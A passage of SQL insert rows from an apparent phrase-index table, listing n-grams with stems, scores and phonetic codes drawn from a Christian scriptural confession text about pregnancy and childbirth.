(222341, 'my body is', 'my body is', 0, 1, 1.3333, 'M132', 1, '*'),
(222342, 'my breast', 'my breast', 0, 1, 1.3, 'M1623', 1, '*'),
(222343, 'my breast milk', 'my breast milk', 0, 1, 1.4667, 'M1623542', 1, '*'),
(222344, 'my case', 'my case', 0, 1, 1.2333, 'M200', 1, '*'),
(222345, 'my case in', 'my case in', 0, 1, 1.3333, 'M250', 1, '*'),
(222346, 'my days', 'my days', 0, 1, 1.2333, 'M320', 1, '*'),
(222347, 'my days to', 'my days to', 0, 1, 1.3333, 'M323', 1, '*'),
(222348, 'my delivery', 'my delivery', 0, 1, 1.3667, 'M3416', 1, '*'),
(222349, 'my delivery it', 'my delivery it', 0, 1, 1.4667, 'M34163', 1, '*'),
(222350, 'my god', 'my god', 0, 1, 1.2, 'M230', 1, '*'),
(222351, 'my god makes', 'my god makes', 0, 1, 1.4, 'M2352', 1, '*'),
(222352, 'my health', 'my health', 0, 1, 1.3, 'M430', 1, '*'),
(222353, 'my health spring', 'my health spring', 0, 1, 1.5333, 'M4321652', 1, '*'),
(222354, 'my members', 'my members', 0, 1, 1.3333, 'M162', 1, '*'),
(222355, 'my members were', 'my members were', 0, 1, 1.5, 'M1626', 1, '*'),
(222356, 'my mother\'s', 'my mother', 0, 1, 1.3667, 'M362', 1, '*'),
(222357, 'my mother\'s womb', 'my mother womb', 0, 1, 1.5333, 'M36251', 1, '*'),
(222358, 'my mother\'s womb.”', 'my mother womb.”', 0, 1, 1.6, 'M36251', 1, '*'),
(222359, 'my pregnancy', 'my pregnancy', 0, 1, 1.4, 'M16252', 1, '*'),
(222360, 'my pregnancy and', 'my pregnancy and', 0, 1, 1.5333, 'M1625253', 1, '*'),
(222361, 'my reins', 'my reins', 0, 1, 1.2667, 'M652', 1, '*'),
(222362, 'my reins thou', 'my reins thou', 0, 1, 1.4333, 'M6523', 1, '*'),
(222363, 'my saying', 'my saying', 0, 1, 1.3, 'M252', 1, '*'),
(222364, 'my saying 21', 'my saying 21', 0, 1, 1.4, 'M252', 1, '*'),
(222365, 'my son', 'my son', 0, 1, 1.2, 'M250', 2, '*'),
(222366, 'my son attend', 'my son attend', 0, 1, 1.4333, 'M25353', 1, '*'),
(222367, 'my soul', 'my soul', 0, 1, 1.2333, 'M240', 1, '*'),
(222368, 'my substance', 'my substance', 0, 1, 1.4, 'M212352', 1, '*'),
(222369, 'my substance yet', 'my substance yet', 0, 1, 1.5333, 'M2123523', 1, '*'),
(222370, 'my womb', 'my womb', 0, 1, 1.2333, 'M100', 1, '*'),
(222371, 'my womb fearfully', 'my womb fearfully', 0, 1, 1.5667, 'M1614', 1, '*'),
(222372, 'my womb for', 'my womb for', 0, 1, 1.3667, 'M160', 1, '*'),
(222373, 'my womb gen', 'my womb gen', 0, 1, 1.3667, 'M125', 1, '*'),
(222374, 'my womb opens', 'my womb opens', 0, 1, 1.4333, 'M152', 1, '*'),
(222375, 'my womb self-normal-delivery', 'my womb self-normal-delivery', 0, 1, 1.9333, 'M124156543416', 1, '*'),
(222376, 'my words', 'my words', 0, 1, 1.2667, 'M632', 1, '*'),
(222377, 'my words incline', 'my words incline', 0, 1, 1.5333, 'M6325245', 1, '*'),
(222378, 'my young', 'my young', 0, 1, 1.2667, 'M200', 1, '*'),
(222379, 'my young before', 'my young before', 0, 1, 1.5, 'M216', 1, '*'),
(222380, 'name everyone', 'name everyone', 0, 1, 1.4333, 'N165', 1, '*'),
(222381, 'name everyone conceived', 'name everyone conceived', 0, 1, 1.7667, 'N16525213', 1, '*'),
(222382, 'name ex', 'name ex', 0, 1, 1.2333, 'N200', 1, '*'),
(222383, 'name ex 1', 'name ex 1', 0, 1, 1.3, 'N200', 1, '*'),
(222384, 'name ex 2', 'name ex 2', 0, 1, 1.3, 'N200', 1, '*'),
(222385, 'name fully-developed-baby', 'name fully-developed-baby', 0, 1, 1.8333, 'N14314131', 1, '*'),
(222386, 'name fully-developed-baby comes', 'name fully-developed-baby comes', 0, 1, 2, 'N14314131252', 1, '*'),
(222387, 'name gen', 'name gen', 0, 1, 1.2667, 'N250', 1, '*'),
(222388, 'name gen 3', 'name gen 3', 0, 1, 1.3333, 'N250', 1, '*'),
(222389, 'name isaiah', 'name isaiah', 0, 1, 1.3667, 'N200', 1, '*'),
(222390, 'name isaiah 66', 'name isaiah 66', 0, 1, 1.4667, 'N200', 1, '*'),
(222391, 'name my', 'name my', 0, 1, 1.2333, 'N000', 1, '*'),
(222392, 'name my god', 'name my god', 0, 1, 1.3667, 'N230', 1, '*'),
(222393, 'name the', 'name the', 0, 1, 1.2667, 'N300', 1, '*'),
(222394, 'name the days', 'name the days', 0, 1, 1.4333, 'N320', 1, '*'),
(222395, 'name.”', 'name.”', 0, 0, 0.4, 'N000', 1, '*'),
(222396, 'name.” ex', 'name.” ex', 0, 1, 1.3, 'N200', 1, '*'),
(222397, 'name.” ex 23', 'name.” ex 23', 0, 1, 1.4, 'N200', 1, '*'),
(222398, 'name.” isaiah', 'name.” isaiah', 0, 1, 1.4333, 'N200', 1, '*'),
(222399, 'name.” isaiah 66', 'name.” isaiah 66', 0, 1, 1.5333, 'N200', 1, '*'),
(222400, 'nation be', 'nation be', 0, 1, 1.3, 'N351', 1, '*'),
(222401, 'nation be born', 'nation be born', 0, 1, 1.4667, 'N35165', 1, '*'),
(222402, 'neat', 'neat', 0, 0, 0.2667, 'N300', 1, '*'),
(222403, 'neat job', 'neat job', 0, 1, 1.2667, 'N321', 1, '*'),
(222404, 'neat job in', 'neat job in', 0, 1, 1.3667, 'N3215', 1, '*'),
(222405, 'night that', 'night that', 0, 1, 1.3333, 'N230', 1, '*'),
(222406, 'night that thou', 'night that thou', 0, 1, 1.5, 'N230', 1, '*'),
(222407, 'no deformity', 'no deformity', 0, 1, 1.4, 'N31653', 1, '*'),
(222408, 'no deformity isaiah', 'no deformity isaiah', 0, 1, 1.6333, 'N316532', 1, '*'),
(222409, 'no delay', 'no delay', 0, 1, 1.2667, 'N340', 1, '*'),
(222410, 'no delay in', 'no delay in', 0, 1, 1.3667, 'N345', 1, '*'),
(222411, 'no malformation', 'no malformation', 0, 1, 1.5, 'N416535', 1, '*'),
(222412, 'no malformation not', 'no malformation not', 0, 1, 1.6333, 'N4165353', 1, '*'),
(222413, 'no miscarriage', 'no miscarriage', 0, 1, 1.4667, 'N262', 1, '*'),
(222414, 'no miscarriage in', 'no miscarriage in', 0, 1, 1.5667, 'N2625', 1, '*'),
(222415, 'no pains', 'no pains', 0, 1, 1.2667, 'N152', 1, '*'),
(222416, 'no pains i', 'no pains i', 0, 1, 1.3333, 'N152', 1, '*'),
(222417, 'no premature', 'no premature', 0, 1, 1.4, 'N16536', 1, '*'),
(222418, 'no premature delivery', 'no premature delivery', 0, 1, 1.7, 'N165363416', 1, '*'),
(222419, 'no still', 'no still', 0, 1, 1.2667, 'N234', 1, '*'),
(222420, 'no still birth', 'no still birth', 0, 1, 1.4667, 'N234163', 1, '*'),
(222421, 'none', 'none', 0, 0, 0.2667, 'N000', 1, '*'),
(222422, 'none of', 'none of', 0, 1, 1.2333, 'N100', 1, '*'),
(222423, 'none of them.”', 'none of them.”', 0, 1, 1.4667, 'N135', 1, '*'),
(222424, 'nor be', 'nor be', 0, 1, 1.2, 'N610', 1, '*'),
(222425, 'nor be barren', 'nor be barren', 0, 1, 1.4333, 'N6165', 1, '*'),
(222426, 'not an unbeliever', 'not an unbeliever', 0, 1, 1.5667, 'N351416', 1, '*'),
(222427, 'not as', 'not as', 0, 1, 1.2, 'N320', 1, '*'),
(222428, 'not as the', 'not as the', 0, 1, 1.3333, 'N323', 1, '*'),
(222429, 'not cast', 'not cast', 0, 1, 1.2667, 'N323', 3, '*'),
(222430, 'not cast my', 'not cast my', 0, 1, 1.3667, 'N3235', 1, '*'),
(222431, 'not cause', 'not cause', 0, 1, 1.3, 'N320', 1, '*'),
(222432, 'not cause to', 'not cause to', 0, 1, 1.4, 'N323', 1, '*'),
(222433, 'not depart', 'not depart', 0, 1, 1.3333, 'N3163', 1, '*'),
(222434, 'not depart from', 'not depart from', 0, 1, 1.5, 'N3163165', 1, '*'),
(222435, 'not depart out', 'not depart out', 0, 1, 1.4667, 'N3163', 1, '*'),
(222436, 'not forceful', 'not forceful', 0, 1, 1.4, 'N316214', 1, '*'),
(222437, 'not forceful ejection', 'not forceful ejection', 0, 1, 1.7, 'N316214235', 1, '*'),
(222438, 'not hid', 'not hid', 0, 1, 1.2333, 'N300', 1, '*'),
(222439, 'not hid from', 'not hid from', 0, 1, 1.4, 'N3165', 1, '*'),
(222440, 'not i', 'not i', 0, 1, 1.1667, 'N300', 1, '*'),
(222441, 'not i have', 'not i have', 0, 1, 1.3333, 'N310', 1, '*'),
(222442, 'not sick', 'not sick', 0, 1, 1.2667, 'N320', 1, '*'),
(222443, 'not sick i', 'not sick i', 0, 1, 1.3333, 'N320', 1, '*'),
(222444, 'not subject', 'not subject', 0, 1, 1.3667, 'N32123', 1, '*'),
(222445, 'not subject to', 'not subject to', 0, 1, 1.4667, 'N32123', 1, '*'),
(222446, 'not the knife', 'not the knife', 0, 1, 1.4333, 'N3251', 1, '*'),
(222447, 'not the vacuum', 'not the vacuum', 0, 1, 1.4667, 'N3125', 1, '*'),
(222448, 'not thou', 'not thou', 0, 1, 1.2667, 'N300', 1, '*'),
(222449, 'not thou shall', 'not thou shall', 0, 1, 1.4667, 'N324', 1, '*'),
(222450, 'not thou shalt', 'not thou shalt', 0, 1, 1.4667, 'N3243', 1, '*'),
(222451, 'not weak', 'not weak', 0, 1, 1.2667, 'N320', 1, '*'),
(222452, 'not weak i', 'not weak i', 0, 1, 1.3333, 'N320', 1, '*'),
(222453, 'not wither', 'not wither', 0, 1, 1.3333, 'N360', 1, '*'),
(222454, 'not wither and', 'not wither and', 0, 1, 1.4667, 'N3653', 1, '*'),
(222455, 'nothing cast', 'noth cast', 0, 1, 1.4, 'N3523', 1, '*'),
(222456, 'nothing cast their', 'noth cast their', 0, 1, 1.6, 'N35236', 1, '*'),
(222457, 'number of', 'number of', 0, 1, 1.3, 'N161', 1, '*'),
(222458, 'number of thy', 'number of thy', 0, 1, 1.4333, 'N1613', 1, '*'),
(222459, 'number than', 'number than', 0, 1, 1.3667, 'N1635', 1, '*'),
(222460, 'number than the', 'number than the', 0, 1, 1.5, 'N16353', 1, '*'),
(222461, 'o', 'o', 0, 0, 0.0667, 'O000', 2, '*'),
(222462, 'o god', 'o god', 0, 1, 1.1667, 'O230', 1, '*'),
(222463, 'o god depart', 'o god depart', 0, 1, 1.4, 'O23163', 1, '*'),
(222464, 'o god how', 'o god how', 0, 1, 1.3, 'O230', 1, '*'),
(222465, 'observe to', 'observ to', 0, 1, 1.3333, 'O12613', 1, '*'),
(222466, 'observe to do', 'observ to do', 0, 1, 1.4333, 'O12613', 1, '*'),
(222467, 'odds', 'odd', 0, 0, 0.2667, 'O320', 1, '*'),
(222468, 'odds my', 'odd my', 0, 1, 1.2333, 'O325', 1, '*'),
(222469, 'odds my baby', 'odd my baby', 0, 1, 1.4, 'O3251', 1, '*'),
(222470, 'oedema', 'oedema', 0, 0, 0.4, 'O350', 1, '*'),
(222471, 'oedema i', 'oedema i', 0, 1, 1.2667, 'O350', 1, '*'),
(222472, 'oedema i reject', 'oedema i reject', 0, 1, 1.5, 'O35623', 1, '*'),
(222473, 'of children', 'of children', 0, 1, 1.3667, 'O124365', 1, '*'),
(222474, 'of children i', 'of children i', 0, 1, 1.4333, 'O124365', 1, '*'),
(222475, 'of children praise', 'of children praise', 0, 1, 1.6, 'O124365162', 1, '*'),
(222476, 'of destiny', 'of destiny', 0, 1, 1.3333, 'O13235', 2, '*'),
(222477, 'of destiny and', 'of destiny and', 0, 1, 1.4667, 'O132353', 2, '*'),
(222478, 'of her', 'of her', 0, 1, 1.2, 'O160', 3, '*'),
(222479, 'of her consolations', 'of her consolations', 0, 1, 1.6333, 'O162524352', 1, '*'),
(222480, 'of her glory', 'of her glory', 0, 1, 1.4, 'O16246', 1, '*'),
(222481, 'of my body', 'of my body', 0, 1, 1.3333, 'O1513', 1, '*'),
(222482, 'of my womb', 'of my womb', 0, 1, 1.3333, 'O151', 1, '*'),
(222483, 'of pregnancy', 'of pregnancy', 0, 1, 1.4, 'O16252', 1, '*'),
(222484, 'of pregnancy and', 'of pregnancy and', 0, 1, 1.5333, 'O1625253', 1, '*'),
(222485, 'of surgeons', 'of surgeons', 0, 1, 1.3667, 'O126252', 1, '*'),
(222486, 'of surgeons not', 'of surgeons not', 0, 1, 1.5, 'O12625253', 1, '*'),
(222487, 'of the earth.”', 'of the earth.”', 0, 1, 1.4667, 'O1363', 1, '*'),
(222488, 'of the law', 'of the law', 0, 1, 1.3333, 'O134', 1, '*'),
(222489, 'of them 18.“if', 'of them 18.“if', 0, 1, 1.4667, 'O1351', 1, '*'),
(222490, 'of them.”', 'of them.”', 0, 1, 1.3, 'O135', 1, '*'),
(222491, 'of them.” 17', 'of them.” 17', 0, 1, 1.4, 'O135', 1, '*'),
(222492, 'of thine', 'of thine', 0, 1, 1.2667, 'O135', 1, '*'),
(222493, 'of thine heart', 'of thine heart', 0, 1, 1.4667, 'O13563', 1, '*'),
(222494, 'of thy', 'of thy', 0, 1, 1.2, 'O130', 1, '*'),
(222495, 'of thy body', 'of thy body', 0, 1, 1.3667, 'O1313', 1, '*'),
(222496, 'of thy body,”', 'of thy body,”', 0, 1, 1.4333, 'O1313', 1, '*'),
(222497, 'of thy days', 'of thy days', 0, 1, 1.3667, 'O132', 1, '*'),
(222498, 'of thy mouth', 'of thy mouth', 0, 1, 1.4, 'O1353', 1, '*'),
(222499, 'of thy salutation', 'of thy salutation', 0, 1, 1.5667, 'O132435', 1, '*'),
(222500, 'of water that', 'of water that', 0, 1, 1.4333, 'O1363', 1, '*'),
(222501, 'on a tree', 'on a tree', 0, 1, 1.3, 'O536', 1, '*'),
(222502, 'once for', 'onc for', 0, 1, 1.2667, 'O5216', 1, '*'),
(222503, 'once for as', 'onc for as', 0, 1, 1.3667, 'O52162', 1, '*'),
(222504, 'one day or', 'on day or', 0, 1, 1.3333, 'O536', 1, '*'),
(222505, 'one that hangeth', 'on that hangeth', 0, 1, 1.5333, 'O53523', 1, '*'),
(222506, 'opens very', 'open very', 0, 1, 1.3333, 'O15216', 1, '*'),
(222507, 'opens very well', 'open very well', 0, 1, 1.5, 'O152164', 1, '*'),
(222508, 'other children i', 'other children i', 0, 1, 1.5333, 'O3624365', 1, '*'),
(222509, 'out and be', 'out and be', 0, 1, 1.3333, 'O3531', 1, '*'),
(222510, 'out of my', 'out of my', 0, 1, 1.3, 'O315', 1, '*'),
(222511, 'out of thy', 'out of thy', 0, 1, 1.3333, 'O313', 1, '*'),
(222512, 'out-by', 'out-bi', 0, 0, 0.4, 'O310', 1, '*'),
(222513, 'out-by himself', 'out-bi himself', 0, 1, 1.4667, 'O315241', 1, '*'),
(222514, 'out-by himself herself', 'out-bi himself herself', 0, 1, 1.7333, 'O3152416241', 1, '*'),
(222515, 'outer', 'outer', 0, 0, 0.3333, 'O360', 1, '*'),
(222516, 'outer man', 'outer man', 0, 1, 1.3, 'O365', 1, '*'),
(222517, 'outer man luke', 'outer man luke', 0, 1, 1.4667, 'O36542', 1, '*'),
(222518, 'over thee.”', 'over thee.”', 0, 1, 1.3667, 'O163', 1, '*'),
(222519, 'over thee.” gal', 'over thee.” gal', 0, 1, 1.5, 'O16324', 1, '*'),
(222520, 'pain', 'pain', 0, 0, 0.2667, 'P500', 2, '*'),
(222521, 'pain came', 'pain came', 0, 1, 1.3, 'P525', 1, '*'),
(222522, 'pain came she', 'pain came she', 0, 1, 1.4333, 'P5252', 1, '*'),
(222523, 'pain i', 'pain i', 0, 1, 1.2, 'P500', 1, '*'),
(222524, 'pain i am', 'pain i am', 0, 1, 1.3, 'P500', 1, '*'),
(222525, 'pain in', 'pain in', 0, 1, 1.2333, 'P500', 1, '*'),
(222526, 'pain in christ', 'pain in christ', 0, 1, 1.4667, 'P52623', 1, '*'),
(222527, 'pains', 'pain', 0, 0, 0.3333, 'P520', 1, '*'),
(222528, 'pains i', 'pain i', 0, 1, 1.2333, 'P520', 1, '*'),
(222529, 'pains i am', 'pain i am', 0, 1, 1.3333, 'P525', 1, '*'),
(222530, 'pains i reject', 'pain i reject', 0, 1, 1.4667, 'P52623', 1, '*'),
(222531, 'pale', 'pale', 0, 0, 0.2667, 'P400', 1, '*'),
(222532, 'pale i', 'pale i', 0, 1, 1.2, 'P400', 1, '*'),
(222533, 'pale i reject', 'pale i reject', 0, 1, 1.4333, 'P4623', 1, '*'),
(222534, 'parts of', 'part of', 0, 1, 1.2667, 'P6321', 1, '*'),
(222535, 'parts of the', 'part of the', 0, 1, 1.4, 'P63213', 1, '*'),
(222536, 'pass when', 'pass when', 0, 1, 1.3, 'P250', 1, '*'),
(222537, 'pass when she', 'pass when she', 0, 1, 1.4333, 'P252', 1, '*'),
(222538, 'perfectly', 'perfectli', 0, 0, 0.6, 'P61234', 1, '*'),
(222539, 'perfectly no', 'perfectli no', 0, 1, 1.4, 'P612345', 1, '*'),
(222540, 'perfectly no deformity', 'perfectli no deformity', 0, 1, 1.7333, 'P61234531653', 1, '*'),
(222541, 'period the', 'period the', 0, 1, 1.3333, 'P630', 1, '*'),
(222542, 'period the lord', 'period the lord', 0, 1, 1.5, 'P63463', 1, '*'),
(222543, 'pharaoh', 'pharaoh', 0, 0, 0.4667, 'P600', 1, '*'),
(222544, 'pharaoh because', 'pharaoh because', 0, 1, 1.5, 'P612', 1, '*'),
(222545, 'pharaoh because the', 'pharaoh because the', 0, 1, 1.6333, 'P6123', 1, '*'),
(222546, 'phil', 'phil', 0, 0, 0.2667, 'P400', 1, '*'),
(222547, 'phil 4', 'phil 4', 0, 1, 1.2, 'P400', 1, '*'),
(222548, 'phil 4 3', 'phil 4 3', 0, 1, 1.2667, 'P400', 1, '*'),
(222549, 'physically', 'physic', 0, 0, 0.6667, 'P240', 1, '*'),
(222550, 'physically active', 'physic active', 0, 1, 1.5667, 'P24231', 1, '*'),
(222551, 'physically active and', 'physic active and', 0, 1, 1.7, 'P2423153', 1, '*'),
(222552, 'pitosin', 'pitosin', 0, 0, 0.4667, 'P325', 1, '*'),
(222553, 'pitosin not', 'pitosin not', 0, 1, 1.3667, 'P3253', 1, '*'),
(222554, 'pitosin not the', 'pitosin not the', 0, 1, 1.5, 'P3253', 1, '*'),
(222555, 'planted', 'plant', 0, 0, 0.4667, 'P453', 1, '*'),
(222556, 'planted by', 'plant by', 0, 1, 1.3333, 'P4531', 1, '*'),
(222557, 'planted by the', 'plant by the', 0, 1, 1.4667, 'P45313', 1, '*'),
(222558, 'pleased', 'pleas', 0, 0, 0.4667, 'P423', 1, '*'),
(222559, 'pleased god', 'pleas god', 0, 1, 1.3667, 'P42323', 1, '*'),
(222560, 'pleased god who', 'pleas god who', 0, 1, 1.5, 'P42323', 1, '*'),
(222561, 'plenteous', 'plenteou', 0, 0, 0.6, 'P4532', 1, '*'),
(222562, 'plenteous in', 'plenteou in', 0, 1, 1.4, 'P45325', 1, '*'),
(222563, 'plenteous in goods', 'plenteou in goods', 0, 1, 1.6, 'P45325232', 1, '*'),
(222564, 'possessed my', 'possess my', 0, 1, 1.4, 'P235', 1, '*'),
(222565, 'possessed my reins', 'possess my reins', 0, 1, 1.6, 'P235652', 1, '*'),
(222566, 'praise thee', 'prais thee', 0, 1, 1.3667, 'P623', 1, '*'),
(222567, 'praise thee for', 'prais thee for', 0, 1, 1.5, 'P62316', 1, '*'),
(222568, 'praise ye', 'prais ye', 0, 1, 1.3, 'P620', 1, '*'),
(222569, 'praise ye the', 'prais ye the', 0, 1, 1.4333, 'P623', 1, '*'),
(222570, 'precious also', 'preciou also', 0, 1, 1.4333, 'P6242', 1, '*'),
(222571, 'precious also are', 'preciou also are', 0, 1, 1.5667, 'P62426', 1, '*'),
(222572, 'pregnancy', 'pregnanc', 0, 0, 0.6, 'P6252', 1, '*'),
(222573, 'pregnancy .”', 'pregnanc .”', 0, 1, 1.4, 'P6252', 1, '*'),
(222574, 'pregnancy .” gen', 'pregnanc .” gen', 0, 1, 1.5333, 'P62525', 1, '*'),
(222575, 'pregnancy and', 'pregnanc and', 0, 1, 1.4333, 'P625253', 1, '*'),
(222576, 'pregnancy and childbirth', 'pregnanc and childbirth', 0, 1, 1.8, 'P625253243163', 1, '*'),
(222577, 'pregnancy and delivery', 'pregnanc and delivery', 0, 1, 1.7333, 'P625253416', 1, '*'),
(222578, 'pregnant women', 'pregnant women', 0, 1, 1.4667, 'P62535', 1, '*'),
(222579, 'premature', 'prematur', 0, 0, 0.6, 'P6536', 1, '*'),
(222580, 'premature delivery', 'prematur delivery', 0, 1, 1.6, 'P65363416', 1, '*'),
(222581, 'premature delivery i', 'prematur delivery i', 0, 1, 1.6667, 'P65363416', 1, '*'),
(222582, 'prosper i', 'prosper i', 0, 1, 1.3, 'P6216', 1, '*'),
(222583, 'prosper i prosper', 'prosper i prosper', 0, 1, 1.5667, 'P621616216', 1, '*'),
(222584, 'prosper in', 'prosper in', 0, 1, 1.3333, 'P62165', 1, '*'),
(222585, 'prosper in my', 'prosper in my', 0, 1, 1.4333, 'P62165', 1, '*'),
(222586, 'prosperous', 'prosper', 0, 0, 0.6667, 'P62162', 1, '*'),
(222587, 'prosperous and', 'prosper and', 0, 1, 1.4667, 'P6216253', 1, '*'),
(222588, 'prosperous and then', 'prosper and then', 0, 1, 1.6333, 'P62162535', 1, '*'),
(222589, 'proverb', 'proverb', 0, 0, 0.4667, 'P6161', 1, '*'),
(222590, 'proverb 4', 'proverb 4', 0, 1, 1.3, 'P6161', 1, '*'),
(222591, 'proverb 4 20-22', 'proverb 4 20-22', 0, 1, 1.5, 'P6161', 1, '*'),
(222592, 'psalm 1', 'psalm 1', 0, 1, 1.2333, 'P245', 1, '*'),
(222593, 'psalm 1 3', 'psalm 1 3', 0, 1, 1.3, 'P245', 1, '*'),
(222594, 'psalm 113', 'psalm 113', 0, 1, 1.3, 'P245', 1, '*'),
(222595, 'psalm 113 9', 'psalm 113 9', 0, 1, 1.3667, 'P245', 1, '*'),
(222596, 'psalm 139', 'psalm 139', 0, 1, 1.3, 'P245', 1, '*'),
(222597, 'psalm 139 13-19', 'psalm 139 13-19', 0, 1, 1.5, 'P245', 1, '*'),
(222598, 'pump', 'pump', 0, 0, 0.2667, 'P510', 1, '*'),
(222599, 'pump it', 'pump it', 0, 1, 1.2333, 'P513', 1, '*'),
(222600, 'pump it is', 'pump it is', 0, 1, 1.3333, 'P5132', 1, '*'),
(222601, 'purpose who', 'purpos who', 0, 1, 1.3667, 'P612', 1, '*'),
(222602, 'purpose who survives', 'purpos who survives', 0, 1, 1.6667, 'P612612', 1, '*'),
(222603, 'receive god\'s', 'receiv god', 0, 1, 1.4333, 'R21232', 1, '*'),
(222604, 'receive god\'s hands', 'receiv god hands', 0, 1, 1.6333, 'R21232532', 1, '*'),
(222605, 'redeemed', 'redeem', 0, 0, 0.5333, 'R353', 1, '*'),
(222606, 'redeemed from', 'redeem from', 0, 1, 1.4333, 'R353165', 1, '*'),
(222607, 'redeemed from labor', 'redeem from labor', 0, 1, 1.6333, 'R353165416', 1, '*'),
(222608, 'redeemed from the', 'redeem from the', 0, 1, 1.5667, 'R3531653', 1, '*'),
(222609, 'redeemed me', 'redeem me', 0, 1, 1.3667, 'R3535', 1, '*'),
(222610, 'redeemed me from', 'redeem me from', 0, 1, 1.5333, 'R3535165', 1, '*'),
(222611, 'redeemed us', 'redeem us', 0, 1, 1.3667, 'R3532', 1, '*'),
(222612, 'redeemed us from', 'redeem us from', 0, 1, 1.5333, 'R3532165', 1, '*'),
(222613, 'reins', 'rein', 0, 0, 0.3333, 'R520', 1, '*'),
(222614, 'reins thou', 'rein thou', 0, 1, 1.3333, 'R523', 1, '*'),
(222615, 'reins thou hast', 'rein thou hast', 0, 1, 1.5, 'R52323', 1, '*'),
(222616, 'reject', 'reject', 0, 0, 0.4, 'R230', 1, '*'),
(222617, 'reject body', 'reject body', 0, 1, 1.3667, 'R2313', 1, '*'),
(222618, 'reject body back', 'reject body back', 0, 1, 1.5333, 'R231312', 1, '*'),
(222619, 'reject early', 'reject early', 0, 1, 1.4, 'R2364', 1, '*'),
(222620, 'reject early morning', 'reject early morning', 0, 1, 1.6667, 'R23645652', 1, '*'),
(222621, 'reject every', 'reject every', 0, 1, 1.4, 'R2316', 1, '*'),
(222622, 'reject every delay', 'reject every delay', 0, 1, 1.6, 'R231634', 1, '*'),
(222623, 'reject fainting', 'reject fainting', 0, 1, 1.5, 'R2315352', 1, '*'),
(222624, 'reject fainting and', 'reject fainting and', 0, 1, 1.6333, 'R231535253', 1, '*'),
(222625, 'reject labor', 'reject labor', 0, 1, 1.4, 'R23416', 1, '*'),
(222626, 'reject labor pain', 'reject labor pain', 0, 1, 1.5667, 'R2341615', 1, '*'),
(222627, 'reject oedema', 'reject oedema', 0, 1, 1.4333, 'R235', 1, '*'),
(222628, 'reject oedema i', 'reject oedema i', 0, 1, 1.5, 'R235', 1, '*'),
(222629, 'remain blessed', 'remain blessed', 0, 1, 1.4667, 'R51423', 1, '*'),
(222630, 'remain blessed in', 'remain blessed in', 0, 1, 1.5667, 'R514235', 1, '*'),
(222631, 'reward.”', 'reward.”', 0, 0, 0.5333, 'R300', 1, '*'),
(222632, 'reward.” my', 'reward.” my', 0, 1, 1.3667, 'R350', 1, '*'),
(222633, 'reward.” my health', 'reward.” my health', 0, 1, 1.6, 'R3543', 1, '*'),
(222634, 'right in my', 'right in my', 0, 1, 1.3667, 'R235', 1, '*'),
(222635, 'right well.”', 'right well.”', 0, 1, 1.4, 'R234', 1, '*'),
(222636, 'right well.” 15', 'right well.” 15', 0, 1, 1.5, 'R234', 1, '*'),
(222637, 'righteousness shall', 'righteous shall', 0, 1, 1.6333, 'R232524', 1, '*'),
(222638, 'righteousness shall go', 'righteous shall go', 0, 1, 1.7333, 'R2325242', 1, '*'),
(222639, 'rivers', 'river', 0, 0, 0.4, 'R162', 1, '*'),
(222640, 'rivers of', 'river of', 0, 1, 1.3, 'R1621', 1, '*'),
(222641, 'rivers of water', 'river of water', 0, 1, 1.5, 'R162136', 1, '*'),
(222642, 'rule over', 'rule over', 0, 1, 1.3, 'R416', 1, '*'),
(222643, 'rule over thee.”', 'rule over thee.”', 0, 1, 1.5333, 'R4163', 1, '*'),
(222644, 'said i have', 'said i have', 0, 1, 1.3667, 'S310', 1, '*'),
(222645, 'said i will', 'said i will', 0, 1, 1.3667, 'S340', 1, '*'),
(222646, 'said unto her', 'said unto her', 0, 1, 1.4333, 'S3536', 1, '*'),
(222647, 'said unto pharaoh', 'said unto pharaoh', 0, 1, 1.5667, 'S35316', 1, '*'),
(222648, 'saith thy', 'saith thy', 0, 1, 1.3, 'S300', 1, '*'),
(222649, 'saith thy god', 'saith thy god', 0, 1, 1.4333, 'S323', 1, '*'),
(222650, 'salutation', 'salut', 0, 0, 0.6667, 'S435', 1, '*'),
(222651, 'salutation sounded', 'salut sounded', 0, 1, 1.6, 'S435253', 1, '*'),
(222652, 'salutation sounded in', 'salut sounded in', 0, 1, 1.7, 'S4352535', 1, '*'),
(222653, 'sand', 'sand', 0, 0, 0.2667, 'S530', 1, '*'),
(222654, 'sand when', 'sand when', 0, 1, 1.3, 'S535', 1, '*'),
(222655, 'sand when i', 'sand when i', 0, 1, 1.3667, 'S535', 1, '*'),
(222656, 'satisfied', 'satisfi', 0, 0, 0.6, 'S3213', 1, '*'),
(222657, 'satisfied with', 'satisfi with', 0, 1, 1.4667, 'S3213', 1, '*'),
(222658, 'satisfied with my', 'satisfi with my', 0, 1, 1.5667, 'S32135', 1, '*'),
(222659, 'satisfied with the', 'satisfi with the', 0, 1, 1.6, 'S3213', 1, '*'),
(222660, 'saw him', 'saw him', 0, 1, 1.2333, 'S500', 1, '*'),
(222661, 'saw him that', 'saw him that', 0, 1, 1.4, 'S530', 1, '*'),
(222662, 'saying 21', 'sai 21', 0, 1, 1.3, 'S520', 1, '*'),
(222663, 'saying 21 let', 'sai 21 let', 0, 1, 1.4333, 'S5243', 1, '*'),
(222664, 'scriptural confession', 'scriptur confession', 0, 1, 1.7, 'S6136425125', 1, '*'),
(222665, 'scriptural confession for', 'scriptur confession for', 0, 1, 1.8333, 'S613642512516', 1, '*'),
(222666, 'scriptures your', 'scriptur your', 0, 1, 1.5, 'S613626', 1, '*'),
(222667, 'scriptures your daily', 'scriptur your daily', 0, 1, 1.7, 'S61362634', 1, '*'),
(222668, 'season his', 'season his', 0, 1, 1.3333, 'S520', 1, '*'),
(222669, 'season his leaf', 'season his leaf', 0, 1, 1.5, 'S5241', 1, '*'),
(222670, 'secret and', 'secret and', 0, 1, 1.3333, 'S6353', 1, '*'),
(222671, 'secret and curiously', 'secret and curiously', 0, 1, 1.6667, 'S63532624', 1, '*'),
(222672, 'see my', 'see my', 0, 1, 1.2, 'S500', 1, '*'),
(222673, 'see my substance', 'see my substance', 0, 1, 1.5333, 'S5212352', 1, '*'),
(222674, 'seen such', 'seen such', 0, 1, 1.3, 'S520', 1, '*'),
(222675, 'seen such things', 'seen such things', 0, 1, 1.5333, 'S52352', 1, '*'),
(222676, 'self-normal-delivery', 'self-normal-deliveri', 0, 0, 1, 'S4156543416', 1, '*'),
(222677, 'self-normal-delivery in', 'self-normal-deliveri in', 0, 1, 1.7667, 'S41565434165', 1, '*'),
(222678, 'self-normal-delivery in jesus', 'self-normal-deliveri in jesus', 0, 1, 1.9667, 'S415654341652', 1, '*'),
(222679, 'separated me', 'separ me', 0, 1, 1.4, 'S1635', 1, '*'),
